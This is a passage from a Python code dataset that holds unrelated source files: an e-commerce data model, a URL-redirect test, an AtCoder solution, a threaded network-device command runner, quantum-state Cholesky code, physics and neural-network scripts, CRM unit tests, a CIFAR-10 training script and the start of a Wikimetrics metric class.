self.shipping_fee = shipping_fee\n self.style_color = style_color\n self.style_size = style_size\n self.image_url = image_url\n self.weight = weight\n self.extra_image_list = extra_image_list\n\n\nclass ProductImage:\n def __init__(self, resource_id, url, goods_sku_list, main_image, sku_image):\n self.resource_id = resource_id\n self.url = url\n self.goods_sku_list = goods_sku_list\n self.main_image = main_image\n self.sku_image = sku_image\n\n\nclass Product:\n def __init__(self, product_id, cat_id, main_image, goods_name, goods_description, parent_sku, sku_list, image_list):\n self.id = product_id\n self.cat_id = cat_id\n self.main_image = main_image\n self.name = goods_name\n self.description = goods_description\n self.parent_sku = parent_sku\n self.sku_list = sku_list\n self.image_list = image_list\n\n\nclass UploadStatus:\n def __init__(self, status, message, product_list):\n self.status = status\n self.message = message\n self.product_list = product_list\n\n\nclass UploadProductDto:\n def __init__(self, cat_id, parent_sku, goods_sku, goods_name, storage, style_color, style_size,\n goods_description, shop_price, shipping_fee, shipping_weight, main_image,\n extra_image, extra_image_list):\n self.cat_id = cat_id\n self.parent_sku = parent_sku\n self.goods_sku = goods_sku\n self.goods_name = goods_name\n self.storage = storage\n self.style_color = style_color\n self.style_size = style_size\n self.goods_description = goods_description\n self.shop_price = shop_price\n self.shipping_fee = shipping_fee\n self.main_image = main_image\n self.shipping_weight = shipping_weight\n self.extra_image = extra_image\n self.extra_image_list = extra_image_list\n\n @staticmethod\n def from_product(product):\n dto_list = []\n for sku in product.sku_list:\n dto = UploadProductDto(cat_id=product.cat_id,\n parent_sku=product.parent_sku,\n goods_sku=sku.sku,\n goods_name=product.name,\n goods_description=product.description,\n storage=sku.storage,\n style_color=sku.style_color,\n style_size=sku.style_size,\n shop_price=sku.price,\n shipping_fee=sku.shipping_fee,\n shipping_weight=sku.weight,\n main_image=product.main_image,\n extra_image=sku.image_url,\n extra_image_list=product.image_list)\n dto_list.append(dto)\n return dto_list\n","sub_path":"ecommerce-facade/model/product_model.py","file_name":"product_model.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"265267853","text":"from minet.utils import resolve, create_pool\n\nURLS = [\n\n # Direct hit\n 'https://www.lemonde.fr/',\n\n # Regular redirect\n 'http://bit.ly/2KkpxiW',\n\n # Self loop\n 'https://demo.cyotek.com/features/redirectlooptest.php',\n 'https://bit.ly/2gnvlgb',\n\n # Meta refresh & UA nonsense\n 'http://bit.ly/2YupNmj',\n\n # Invalid URL\n 'http://www.outremersbeyou.com/talent-de-la-semaine-la-designer-comorienne-aisha-wadaane-je-suis-fiere-de-mes-origines/',\n\n # Refresh header\n 'http://la-grange.net/2015/03/26/refresh/',\n\n # GET & UA nonsense\n 'https://ebay.us/BUkuxU',\n\n # Incorrect refresh header\n 'http://ow.ly/csT350v7mRc',\n\n # Utf-8 location header\n 'http://ow.ly/2awz50v1JkO',\n 'http://xfru.it/v2uFaC',\n\n # IP Host redirect\n 'https://bit.ly/2ANzJNW'\n]\n\nhttp = create_pool()\n\nfor url in URLS:\n print()\n error, stack = resolve(http, url, follow_meta_refresh=True)\n print(error)\n for item in stack:\n print(item)\n","sub_path":"ftest/resolve.py","file_name":"resolve.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"607560830","text":"from collections import defaultdict\n\nN = int(input())\nMOD = 10**9 + 7\n\nprimeCount = defaultdict(int)\n\ndef primeList(n):\n p = 2\n primeList = defaultdict(int)\n while n > 1:\n if n % p == 0:\n while n % p == 0:\n primeList[p] += 1\n n //= p\n p += 1\n if n >= 2:\n primeList[n] = 1\n return primeList\n\nfor i in range(1, N + 1):\n for prime, count in primeList(i).items():\n primeCount[prime] += count\n\nans = 1\nfor _, count in primeCount.items():\n ans *= (count + 1)\n ans %= MOD\n\nprint(ans)","sub_path":"AtCoder/abc/052c.py","file_name":"052c.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"582679832","text":"#!/usr/bin/python3\n# Version 1.0\n# Author hiziv\n\ntry:\n import Queue\nexcept ImportError:\n import queue as Queue\nimport threading\nimport time\nfrom psendcommand import *\n\nexitFlag = 0\n\nclass myThread (threading.Thread):\n def __init__(self, threadID, name, q):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.q = q\n def run(self):\n print (\"Starting \" + self.name)\n process_data(self.name, self.q)\n print (\"Exiting \" + self.name)\n\ndef process_data(threadName, q):\n while not exitFlag:\n queueLock.acquire()\n if not workQueue.empty():\n data = q.get()\n queueLock.release()\n #print (\"%s processing %s\" % (threadName, data))\n print (data)\n send (data)\n print (adict)\n else:\n queueLock.release()\n time.sleep(1)\n\nthreadList = [\"Thread-1\", \"Thread-2\", \"Thread-3\"]\n#nameList = [\"One\", \"Two\", \"Three\", \"Four\", \"Five\"]\nqueueLock = threading.Lock()\nworkQueue = Queue.Queue(2000)\nthreads = []\nthreadID = 1\nnameList=[]\n\nlist_devices=open('list.txt').readlines() #This will read the list of devices that file is on the same location as the script -- it's something I have to change\n\n#pdb.set_trace()\nfor i in list_devices:\n x=i.split ()\n if len(x) == 7 :\n sMethod = (x[0])\n sHostname = (x[1])\n sIp = (x[2])\n sUsername = (x[3])\n sPassword = (x[4])\n sEnable = (x[5])\n sUID = (x[6])\n nameList.append(sMethod + \",\" + sHostname + \",\" + sIp + \",\" + sUsername + \",\" + sPassword + \",\" + sEnable + \",\" + sUID) \n #print (adict)\n else:\n print ('not enough arguments for device ' + x[1])\n\n\n\n# Create new threads\nfor tName in threadList:\n thread = myThread(threadID, tName, workQueue)\n thread.start()\n threads.append(thread)\n threadID += 1\n\n# Fill the queue\nqueueLock.acquire()\nfor word in nameList:\n workQueue.put(word)\nqueueLock.release()\n\n# Wait for queue to empty\nwhile not workQueue.empty():\n pass\n\n# Notify threads it's time to exit\nexitFlag = 1\n\n# Wait for all threads to complete\nfor t in threads:\n t.join()\nprint (\"Exiting Main Thread\")\n","sub_path":"app/utils/psendcommand/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"203699207","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef getTsFromCholesky(T):\n\t'''Function that creates list of t-parameters from cholesky T matrix.'''\n\tt = []\n\tfor r in range(T.shape[0]):\n\t\tfor c in range(T.shape[1]):\n\t\t\tif r == c:\n\t\t\t\tt.append(T[r][c].real)\n\t\t\telif r>c:\n\t\t\t\tif T[r][c] == 0:\n\t\t\t\t\tt.append(0)\n\t\t\t\t\tt.append(0)\n\t\t\t\telif isinstance(T[r][c], complex):\n\t\t\t\t\tt.append(T[r][c].real)\n\t\t\t\t\tt.append(T[r][c].imag)\n\t\t\t\telse:\n\t\t\t\t\tt.append(T[r][c].real)\n\t\t\t\t\tt.append(0)\n\t\t\t\t'''if c == 0:\n\t\t\t\t\ttemp_dict[i] = [T[r][c].real]\n\t\t\t\telse:\n\t\t\t\t\tif isinstance(T[r][c], complex):\n\t\t\t\t\t\ttemp_dict[i] = [T[r][c].real, T[r][c].imag]\n\t\t\t\t\telse: \n\t\t\t\t\t\ttemp_dict[i] = [T[r][c]]\n\t\t\t\ti+=1\n\n\tfor key, val in sorted(temp_dict.items()):\n\t\tt = t + val'''\n\tprint(len(t))\n\treturn t\n\ndef getRhofromt_NQB(n,nlvl,t):\n\t\"\"\"Function that takes guess of Cholesky decomposition of density matrix,\n\tand returns a 8x8 density matrix\n\n\tThe Cholesky decomposition for three-qubit density matrix is:\n\trho = (T.dag() * T)/(Tr(T.dag() * T))\n\twhere T is upper triangular matrix of the form\n\tT = [[ t_0 , 0 , 0 , 0 ],\n\t\t [ t_4+it_5 , t_1 , 0 , 0],\n\t\t [ t_10+it_11, t_6+it_7 , t_2 , 0],\n\t\t [ t_14+it_15, t_12+it_13 , t_8+it_9 , t_3] ...\n\t\t ...]\n\tParameters\n\t----------\n\tt : array\n\t\tlength = 64, containing (real) values of t's\n\n\tReturns\n\t-------\n\trho_t: array\n\t\t4x4 density matrix\n\n\t\"\"\"\n\t'''\n\tFunction that takes a t (len=64) and generates the 8x8 density matrix from\n\tCholesky decomp:rho = (T.dag() * T)/(Tr(T.dag() * T))\n\n\t'''\n\t'''T = np.matrix([[t[0], 0, 0, 0],\n\t\t\t\t [t[1] + 1j*t[2], t[3], 0, 0],\n\t\t\t\t [t[4] + 1j*t[5], t[6] + 1j*t[7], t[8], 0],\n\t\t\t\t [t[9] + 1j*t[10], t[11] + 1j*t[12], t[13] + 1j*t[14], t[15]] ...])\n\t'''\n\tT = []\n\tk=0\n\tfor r in range(nlvl**n):\n\t\trow = []\n\t\tfor c in range(nlvl**n):\n\t\t\tif c > r:\n\t\t\t\trow.append(0)\n\t\t\telif c == r:\n\t\t\t\trow.append(t[k])\n\t\t\t\tk+=1\n\t\t\telse:\n\t\t\t\trow.append(t[k]+1j*t[k+1])\n\t\t\t\tk+=2\n\t\tT.append(row)\n\n\tT=np.array(T)\n\tplt.matshow(T.real, cmap='hot', interpolation='nearest')\n\tplt.title(\"GENERATED CHOLESKY\")\n\tplt.show()\n\n\tprint(T.real)\n\tprint(\"*****************************************\")\n\n\n\tnorm = np.dot(T, T.transpose().conj()).trace()\n\tprint(norm)\n\tplt.matshow(T.conjugate().transpose().real, cmap='hot', interpolation='nearest')\n\tplt.title(\"CONJUGATE CHOLESKY\")\n\tplt.show()\n\trho_t = np.dot(T, T.transpose().conj())/norm\n\treturn np.array(rho_t)\n\ndef idealFockRho(phase = 0):\n rho = np.zeros((4,4),dtype=complex)\n rho[1,1] = .5\n rho[2,2] = .5\n rho[2,1] = .5*np.exp(1j*phase)\n rho[1,2] = .5*np.exp(-1j*phase)\n return rho\n\ndef idealNOONRho(phase = 0):\n\trho = np.zeros((9,9),dtype=complex)\n\t#print( 1e-1*np.eye(9))\n\trho[2,2] = .5\n\trho[6,6] = .5\n\trho[2,6] = .5*np.exp(1j*phase)\n\trho[6,2] = .5*np.exp(-1j*phase)\n\treturn rho\n\n#print(idealNOONRho().shape)\n#print(np.eye(9).shape)\n\ndensity_matrix = np.eye(9)\n#density_matrix = idealNOONRho()\n#density_matrix = idealFockRho()\nplt.matshow(density_matrix.real, cmap='hot', interpolation='nearest')\nplt.title(\"ORIG MATRIX\")\nplt.show()\n\ntry:\n\tt_guess = getTsFromCholesky(np.linalg.cholesky(density_matrix))\n\tplt.matshow(np.linalg.cholesky(density_matrix), cmap='hot', interpolation='nearest')\n\tplt.title(\"TRUE CHOLESKY\")\n\tplt.show()\n\tprint(np.linalg.cholesky(density_matrix))\nexcept Exception as e:\n\tprint(e)\n\tt_guess = getTsFromCholesky(np.linalg.cholesky(density_matrix+ 1e-14*np.eye(np.shape(density_matrix)[0])))\n\tplt.matshow(np.linalg.cholesky(density_matrix+ 1e-14*np.eye(np.shape(density_matrix)[0])).real, cmap='hot', interpolation='nearest')\n\tplt.title(\"TRUE CHOLESKY\")\n\tplt.show()\n\tprint(np.linalg.cholesky(density_matrix+ 1e-14*np.eye(np.shape(density_matrix)[0])).real)\n\tprint(\"***************************************\")\n\n\nrho = np.array(getRhofromt_NQB(2,3,t_guess).real)\nprint(\"___________________________\")\nprint(density_matrix)\nprint(\"___________________________\")\nprint(rho)\n\n\nplt.matshow(rho, cmap='hot', interpolation='nearest')\nplt.title(\"GENERATED MATRIX\")\nplt.show()\n\nprint(rho)","sub_path":"MultiQubit_PulseGenerator/NQB/nqb_tomo_cholesky_fix.py","file_name":"nqb_tomo_cholesky_fix.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"103204668","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.constants import k\nfrom math import factorial\n\nk = 1\n\nN = int(300)\nN_len = 800\nq = np.linspace(1,N_len,N_len)\ndq = (q[-1]-q[0])/(len(q)-1)\n\n\nomega = np.zeros(N_len)\nfor i in range(0,N_len):\n omega[i] = factorial(int(q[i])+N-1)/(factorial(int(q[i]))*factorial(N-1))\nS = k*np.log(omega)\n\ndqdS = np.zeros(N_len)\n\nfor i in range(1,N_len):\n dqdS[i] = dq/(S[i]-S[i-1])\nT = dqdS\n\nCv = np.zeros(N_len)\nfor i in range(1,N_len):\n Cv[i] = dq/(T[i]-T[i-1])\n\n\nplt.plot(q,Cv/N,label=r\"$N=%g$\"%(N_len))\nplt.xlabel(\"q\",FontSize=15)\nplt.ylabel(r\"$C_V/Nk$\",FontSize=15)\nplt.legend()\nplt.savefig(\"../figures/C_mot_q.png\")\nplt.clf()\n\nplt.plot(q,S,label=r\"$N=%g$\"%(N_len))\nplt.xlabel(\"q\",FontSize=15)\nplt.ylabel(r\"$S/k$\",FontSize=15)\nplt.legend()\nplt.savefig(\"../figures/S_mot_q.png\")\nplt.clf()\n\noutfile = open(\"../data_files/numerical_data.txt\",\"w+\")\noutfile.write(\"q Omega S T Cv/Nk N=%g\\n\"%(N_len))\nfor i in range(N_len):\n outfile.write(\"%g %.5f %.5f %.5f %.5f\\n\"%(q[i],omega[i],S[i],T[i],Cv[i]/N))\noutfile.close()\n","sub_path":"Oblig_1/python_files/numerical_solver.py","file_name":"numerical_solver.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"134777508","text":"from functools import reduce\n\ndef f(x, y):\n print(x)\n print(y)\n return x\n\n\n\nr =reduce(f, [1, 3, 5, 7, 9])\nprint(r)\n\nopts = [\n ('a','A'),\n # ('weekday', udfs.weekday('ts')),\n #('is_weekend', udfs.is_weekend('ts')),\n ]\n\nvalue1= [1, 3, 5, 7, 9]\nvalue2 = [0,1,2,3,4,5,6,7,8,9,10]\nraw = reduce(f, opts, value1)\nprint(raw)","sub_path":"TestGrammar/reduceTest.py","file_name":"reduceTest.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"91714886","text":"import unittest\nimport os\n\n# Add parent dir to path to import utils\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),\n '..')))\nfrom test_cases import utils\n\n\nclass CRMLead(unittest.TestCase):\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def setUp(self):\n data = {\n 'company': 'API Test Company Name',\n 'last_name': 'API Test Lead Last Name'\n }\n self.obj = self.account.crm_leads.create(data=data)\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def tearDown(self):\n self.obj.delete()\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def test_list_object(self):\n objects = self.account.crm_leads.all()\n # assert properties\n if objects:\n obj = objects[0]\n self.assertEqual(obj.type, 'Lead')\n self.assertTrue('raw' in obj)\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def test_read_object(self):\n obj = self.account.crm_leads.retrieve(self.obj.id)\n # assert Lead properties\n self.assertEqual(obj.id, self.obj.id)\n self.assertEqual(obj.type, 'Lead')\n self.assertTrue('raw' in obj)\n\n self.assertTrue('created' in obj)\n self.assertTrue('modified' in obj)\n self.assertTrue('description' in obj)\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def test_update_object(self):\n obj = self.obj\n obj.description = 'test lead description'\n obj.save()\n self.assertEqual('test lead description', obj.description)\n\n\ndef test_cases():\n return [utils.create_test_case(acc, CRMLead) for acc in utils.accounts]\n\nif __name__ == '__main__':\n suite = utils.create_suite(test_cases())\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"tests/integration/crm_api/test_lead.py","file_name":"test_lead.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"262243685","text":"import numpy as np\nfrom numba import jit\n\n\n@jit(nopython=True)\ndef to_yawpitchroll_jit(R, in_degrees=True, eps=1e-16):\n R = R.reshape((-1, 3, 3))\n ypr = np.empty((R.shape[0], 3), dtype=np.float64)\n for i in range(R.shape[0]):\n if np.any(np.isnan(R[i, :, :])):\n ypr[i, :] = np.nan\n else:\n if np.abs(R[i, 2, 1] - 1) <= eps or np.abs(R[i, 2, 1] + 1) <= eps:\n ypr[i, 0] = 0.0\n ypr[i, 1] = np.arcsin(R[i, 2, 1])\n ypr[i, 2] = np.arctan2(R[i, 1, 0], R[i, 0, 0])\n else:\n p = np.arcsin(R[i, 2, 1])\n ypr[i, 1] = p\n ypr[i, 2] = -np.arctan2(R[i, 2, 0] / np.cos(p), R[i, 2, 2] / np.cos(p))\n ypr[i, 0] = -np.arctan2(R[i, 0, 1] / np.cos(p), R[i, 1, 1] / np.cos(p))\n\n return ypr if not in_degrees else np.rad2deg(ypr)\n\n\ndef to_yawpitchroll(R, in_degrees=True, eps=1e-16):\n # for some reason squeezing the result array in the numba function doesn't work\n return to_yawpitchroll_jit(R, in_degrees=in_degrees, eps=eps).squeeze()\n\n\n","sub_path":"freehead/to_yawpitchroll.py","file_name":"to_yawpitchroll.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"184859159","text":"import random\n\nimport numpy as np\n\n\n\nclass Link:\n \"\"\"A link between two units. Simple, non active class.\"\"\"\n\n def __init__(self, pre_unit, post_unit, w0, fw0):\n self.pre = pre_unit\n self.post = post_unit\n self.wt = w0\n self.fwt = fw0\n self.dwt = 0.0\n\n\nclass Connection:\n \"\"\"Connection between layers\"\"\"\n\n def __init__(self, pre_layer, post_layer, spec=None):\n \"\"\"\n Parameters:\n pre_layer the layer sending its activity.\n post_layer the layer receiving the activity.\n \"\"\"\n self.pre = pre_layer\n self.post = post_layer\n self.links = []\n self.spec = spec\n if self.spec is None:\n self.spec = ConnectionSpec()\n\n self.spec.projection_init(self)\n\n post_layer.connections.append(self)\n\n @property\n def weights(self):\n \"\"\"Return a matrix of the links weights\"\"\"\n if self.spec.proj.lower() == '1to1':\n return np.array([[link.wt for link in self.links]])\n else: # proj == 'full'\n W = np.zeros((len(self.pre.units), len(self.post.units))) # weight matrix\n link_it = iter(self.links) # link iterator\n for i, pre_u in enumerate(self.pre.units):\n for j, post_u in enumerate(self.post.units):\n W[i, j] = next(link_it).wt\n return W\n\n def learn(self):\n self.spec.learn(self)\n\n def cycle(self):\n self.spec.cycle(self)\n\n\n\nclass ConnectionSpec:\n\n legal_proj = 'full', '1to1' # ... for self.proj\n\n def __init__(self, **kwargs):\n \"\"\"Connnection parameters\"\"\"\n self.st = 1.0 # connection strength\n # self.force = False # activity are set directly in the post_layer\n self.inhib = False # if True, inhibitory connection\n self.proj = 'full' # connection pattern between units.\n # Can be 'Full' or '1to1'. In the latter case,\n # the layers must have the same size.\n self.lrule = None # the learning rule to use (None or 'leabra')\n\n # random initialization\n self.rnd_type = 'uniform' # shape of the weight initialization\n self.rnd_mean = 0.5 # mean of the random variable for weights init.\n self.rnd_var = 0.25 # variance (or ±range for uniform)\n\n self.lrate = 0.01 # learning rate\n\n self.m_lrn = 1.0 # weighting of the error driven learning\n\n self.d_thr = 0.0001\n self.d_rev = 0.1\n\n self.sig_off = 1.0\n self.sig_gain = 6.0\n\n for key, value in kwargs.items():\n assert hasattr(self, key) # making sure the parameter exists.\n setattr(self, key, value)\n\n def cycle(self, connection):\n \"\"\"Transmit activity.\"\"\"\n for link in connection.links:\n if not link.post.forced:\n scaled_act = self.st * link.wt * link.pre.act\n link.post.add_excitatory(scaled_act)\n\n def _rnd_wt(self):\n \"\"\"Return a random weight, according to the specified distribution\"\"\"\n if self.rnd_type == 'uniform':\n return random.uniform(self.rnd_mean - self.rnd_var,\n self.rnd_mean + self.rnd_var)\n raise NotImplementedError\n\n def _full_projection(self, connection):\n # creating unit-to-unit links\n connection.links = []\n for pre_u in connection.pre.units:\n for post_u in connection.post.units:\n w0 = self._rnd_wt()\n fw0 = self.sig_inv(w0)\n connection.links.append(Link(pre_u, post_u, w0, fw0))\n\n\n def _1to1_projection(self, connection):\n # creating unit-to-unit links\n connection.links = []\n assert connection.pre.size == connection.post.size\n for pre_u, post_u in zip(connection.pre.units, connection.post.units):\n w0 = self._rnd_wt()\n fw0 = self.sig_inv(w0)\n connection.links.append(Link(pre_u, post_u, w0, fw0))\n\n\n def projection_init(self, connection):\n if self.proj == 'full':\n self._full_projection(connection)\n if self.proj == '1to1':\n self._1to1_projection(connection)\n\n\n def learn(self, connection):\n if self.learn is not None:\n self.learning_rule(connection)\n self.apply_dwt(connection)\n for link in connection.links:\n link.wt = max(0.0, min(1.0, link.wt)) # clipping weights after change\n\n def apply_dwt(self,connection):\n\n for link in connection.links:\n link.dwt *= (1 - link.fwt) if (link.dwt > 0) else link.fwt\n link.fwt += link.dwt\n link.wt = self.sig(link.fwt)\n\n link.dwt = 0.0\n\n def learning_rule(self, connection):\n \"\"\"Leabra learning rule.\"\"\"\n\n for link in connection.links:\n srs = link.post.avg_s_eff * link.pre.avg_s_eff\n srm = link.post.avg_m * link.pre.avg_m\n link.dwt += ( self.lrate * ( self.m_lrn * self.xcal(srs, srm)\n + link.post.avg_l_lrn * self.xcal(srs, link.post.avg_l)))\n\n def xcal(self, x, th):\n if (x < self.d_thr):\n return 0\n elif (x > th * self.d_rev):\n return (x - th)\n else:\n return (-x * ((1 - self.d_rev)/self.d_rev))\n\n def sig(self, w):\n return 1 / (1 + (self.sig_off * (1 - w) / w) ** self.sig_gain)\n\n def sig_inv(self, w):\n return 1 / (1 + ((1 - w) / w) ** (1 / self.sig_gain) / self.sig_off)\n","sub_path":"leabra/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":5628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"208430277","text":"# Import libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport PIL\nimport random\n\nfrom sklearn.utils import shuffle\nfrom skimage.util import random_noise\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import roc_auc_score\n\nimport tensorflow as tf\nimport tensorflow.keras\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\nfrom tensorflow.keras.applications.vgg16 import preprocess_input, decode_predictions, VGG16\nfrom tensorflow.keras.applications import ResNet50\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPool2D , Flatten, Dropout, BatchNormalization\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras import models\nfrom tensorflow.keras.optimizers import SGD,Adam\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau, ModelCheckpoint, EarlyStopping\n\n# Load Data\n(x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data()\n\n#Show random example in category\ndef display_category_examples(pred_val=None):\n \"\"\"If no input, display one example for all category predictions. \n If input is list, displays one example for listed categories. If input\n is integer, display one example for specified category.\"\"\"\n if pred_val==None:\n ys=np.unique(y_train)\n elif type(pred_val)==list:\n ys=pred_val\n elif type(pred_val)==int:\n ys=[pred_val]\n else:\n raise \"Invalid Input\"\n \n for possible_y in ys:\n img_idx=random.choice(np.where(y_train==possible_y)[0])\n plt.imshow(PIL.Image.fromarray(x_train[img_idx]))\n plt.title(str(possible_y))\n plt.show()\n \n#Better Method\ndef display_category_examples_2():\n class_types = ['airplane', 'automobile', 'bird', 'cat', 'deer',\n 'dog', 'frog', 'horse', 'ship', 'truck'] # from cifar-10 website\n \n plt.figure(figsize=(10,10))\n for i in range(12):\n plt.subplot(4,3,i+1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(train_im[i], cmap='gray')\n plt.xlabel(class_types[train_lab[i][0]], fontsize=13)\n plt.tight_layout() \n plt.show()\n#%% Restrict categories [i.e. cats vs dogs]\n# =============================================================================\n# train_idx=np.append(np.where(y_train==3)[0], np.where(y_train==5)[0])\n# test_idx=np.append(np.where(y_test==3)[0], np.where(y_test==5)[0])\n# \n# x_train, y_train=(x_train[train_idx], y_train[train_idx])\n# x_test, y_test=(x_test[test_idx], y_test[test_idx])\n# \n# #Convert y values: 3 (Cats) and 5 (Dogs) to 0 and 1\n# y_train=np.array([0 if i==3 else 1 for i in y_train])\n# y_test=np.array([0 if i==3 else 1 for i in y_test])\n# =============================================================================\n\n#%% Pre-processing model inputs\n#Normalize Image Arrays to [0-1]\n# =============================================================================\n# x_train, x_test = x_train/255.0, x_test/255.0\n# =============================================================================\n \nx_train=tensorflow.keras.applications.resnet.preprocess_input(x_train)\nx_test=tensorflow.keras.applications.resnet.preprocess_input(x_test)\n\n#Reshape arrays\ny_train=y_train.flatten().reshape((y_train.shape[0],1))\ny_test=y_test.flatten().reshape((y_test.shape[0],1))\n\n#Shuffle arrays\n# =============================================================================\n# x_train,y_train=shuffle(x_train,y_train)\n# x_test,y_test=shuffle(x_test,y_test)\n# x_train, x_val, y_train, y_val=train_test_split(x_train, y_train, train_size=0.7, test_size=0.3)\n# =============================================================================\n#%% MODEL\n# =============================================================================\n# base_model_vgg16 = VGG16(include_top = False, weights='imagenet', input_shape = (32,32,3), classes = 2)\n# base_model_vgg16.trainable = False\n# =============================================================================\nbase_model_resnet50=ResNet50(include_top = False, weights='imagenet', input_shape = (224,224,3), classes = 10)\nbase_model_resnet50.trainable=False\n\n# =============================================================================\n# for layer in base_model_resnet50.layers[:]:\n# layer.trainable=False\n# =============================================================================\n\n# =============================================================================\n# model.add(Conv2D(16, kernel_size=(5, 5), \n# strides=(1, 1),\n# activation='relu',\n# kernel_initializer=\"normal\",\n# input_shape=(32,32,3),\n# name=\"conv_1\"\n# ))\n# model.add(MaxPool2D(pool_size=(2, 2), \n# strides=(1, 1)))\n# model.add(Dropout(0.2))\n# model.add(Conv2D(8, (3, 3), \n# activation='relu', \n# kernel_initializer=\"normal\",\n# name=\"conv_2\"))\n# model.add(MaxPool2D(pool_size=(2, 2),\n# name=\"maxpool_1\"))\n# model.add(Dropout(0.2))\n# model.add(Flatten(name=\"flatten\"))\n# model.add(Dense(4, \n# kernel_initializer=\"normal\",\n# activation=\"relu\"))\n# =============================================================================\n# =============================================================================\n# model.add(base_model_resnet50)\n# model.add(Dense(512,\n# activation=\"relu\"))\n# model.add(Dense(32,\n# activation=\"relu\"))\n# model.add(Dense(10,\n# activation=\"softmax\"))\n# model.summary()\n# \n# =============================================================================\n\ninput=tf.keras.Input(shape=(32,32,3))\nreshaped_input=tf.keras.layers.Lambda(lambda x: tf.image.resize_with_pad(x, 224, 224))(input)\nbase_model=base_model_resnet50(reshaped_input)\nflatten=Flatten()(base_model)\noutput=Dense(10, activation=\"softmax\")(flatten)\n\nmodel=tf.keras.Model(input, output)\n#%%Hyper-parameters\nn_batch_size=10\nnum_epoch=50\nlearn_rate=5e-5\n\n#%%Compiling VGG16\nsgd=SGD(lr=learn_rate,momentum=.9,nesterov=False)\nmodel.compile(optimizer = sgd, loss = tf.keras.losses.SparseCategoricalCrossentropy(), metrics = ['accuracy'])\n\n# =============================================================================\n# callbacks = [\n# EarlyStopping(patience=20, verbose=1),\n# ReduceLROnPlateau(factor=0.01, patience=10, min_lr=1e-7, verbose=1)]\n# =============================================================================\n\nhistory = model.fit(x_train, y_train, \n batch_size=n_batch_size,\n epochs=num_epoch,\n validation_data=(x_val, y_val),\n verbose=1, \n shuffle=True)\n\n\n#%%\n# =============================================================================\n# datagen = ImageDataGenerator(\n# featurewise_center=True,\n# featurewise_std_normalization=True,\n# rotation_range=20,\n# width_shift_range=0.2,\n# height_shift_range=0.2,\n# horizontal_flip=True)\n# datagen.fit(x_train)\n# history = model.fit(datagen.flow(x_train, y_train, batch_size=n_batch_size), epochs=num_epoch)\n# =============================================================================\n#%% Evaluate on Test\ny_pred=np.argmax(model.predict(x_test), axis=1)\ncm=confusion_matrix(y_test, y_pred)\n\n# Sensitivity, Specificity, Precision\ntrue_negative, false_positive, false_negative, true_positive = cm.ravel()\nprecision = true_positive / (true_positive + false_positive)\nrecall = true_positive / (true_positive + false_negative)\nspecificity = true_negative / (true_negative + false_positive)\n\nprint('Precison:{:.2f}'.format(precision))\nprint('Sensitivity:{:.2f}'.format(recall))\nprint('Specificity:{:.2f}'.format(specificity))\n\n#AUC\n# =============================================================================\n# auc = roc_auc_score(y_test, y_pred)\n# print(auc)\n# =============================================================================\n","sub_path":"scripts/model_cifar10.py","file_name":"model_cifar10.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"601260462","text":"from sqlalchemy import func\nfrom metric import Metric\nfrom form_fields import CommaSeparatedIntegerListField\nfrom wtforms.validators import Required\nfrom wikimetrics.models import Page, Revision\nimport logging\nlogger = logging.getLogger(__name__)\n\n__all__ = [\n 'NamespaceEdits',\n]\n\n\nclass NamespaceEdits(Metric):\n \"\"\"\n This class implements namespace edits logic.\n An instance of the class is callable and will compute the number of edits\n for each user in a passed-in list.\n \n This sql query was used as a starting point for the sqlalchemy query:\n \n select r.rev_user, r.count(*)\n from revision r\n inner join\n page p on p.page_id = r.rev_page\n where r.rev_timestamp between [start] and [end]\n and r.rev_user in ([parameterized])\n and p.page_namespace in ([parameterized])\n group by rev_user\n \"\"\"\n \n show_in_ui = True\n id = 'edits'\n label = 'Edits'\n description = 'Compute the number of edits in a specific namespace of a mediawiki project'\n \n namespaces = CommaSeparatedIntegerListField(\n None,\n 